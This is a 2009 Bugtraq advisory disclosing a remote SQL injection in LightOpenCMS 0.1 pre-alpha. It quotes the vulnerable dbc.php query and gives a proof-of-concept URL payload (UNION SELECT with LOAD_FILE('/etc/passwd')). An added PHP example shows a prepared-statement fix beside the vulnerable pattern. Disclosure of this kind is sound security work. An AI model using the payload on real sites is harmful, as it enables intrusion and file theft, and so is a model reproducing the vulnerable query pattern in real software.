LightOpenCMS 0.1 pre-alpha Remote SQL Injection
- To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>, str0ke <milw0rm@xxxxxxxxx>
- Subject: LightOpenCMS 0.1 pre-alpha Remote SQL Injection
- From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx@xxxxxxxxx>
- Date: Fri, 5 Jun 2009 15:38:17 +0200
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL statements.
...
if (isset($_GET['id'])) {
    $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
    return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
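The advisory reports no vendor fix. As an added example (not LightOpenCMS code), the dbc.php pattern quoted above is shown beside a hardened version that validates the id and binds it with a PDO prepared statement; the PDO handle and the in-memory SQLite table are assumptions made so the example runs stand-alone.

```php
<?php
// Added example, not part of LightOpenCMS. Assumes $dbh is a PDO connection
// to the CMS database; here an in-memory SQLite table stands in for it.

// Vulnerable pattern (the dbc.php snippet from the advisory): $_GET['id'] is
// concatenated into the query, so a single quote closes the literal and the
// remainder of the parameter is executed as SQL. Returned as a string here
// only so the resulting query text can be inspected.
function buildPageQueryVulnerable(string $id): string
{
    return "SELECT * FROM pages WHERE id='" . $id . "'";
}

// Hardened version: reject anything that is not a decimal page id, then bind
// the value as a typed parameter so the database never parses it as SQL.
// magic_quotes_gpc (the advisory's "requisite") is not relied on; it was
// removed in PHP 5.4 and was never a real defence.
function getPageSafe(PDO $dbh, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {
        return null;   // non-numeric id: refused before any query runs
    }
    $stmt = $dbh->prepare('SELECT * FROM pages WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed request value that breaks out of the quoted literal.
$hostile = "1' OR '1'='1";

// The vulnerable builder hands the attacker's text to the SQL parser verbatim.
echo buildPageQueryVulnerable($hostile), PHP_EOL;

// Constructed fixture (assumption): in-memory SQLite with one page row.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec('CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT)');
$dbh->exec("INSERT INTO pages (id, title) VALUES (1, 'Home')");

// The hardened function refuses the hostile value and serves the valid one.
var_dump(getPageSafe($dbh, $hostile));
var_dump(getPageSafe($dbh, '1'));
```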
***************************************************
--
Salvatore Fresta aka drosophila
CWNP444351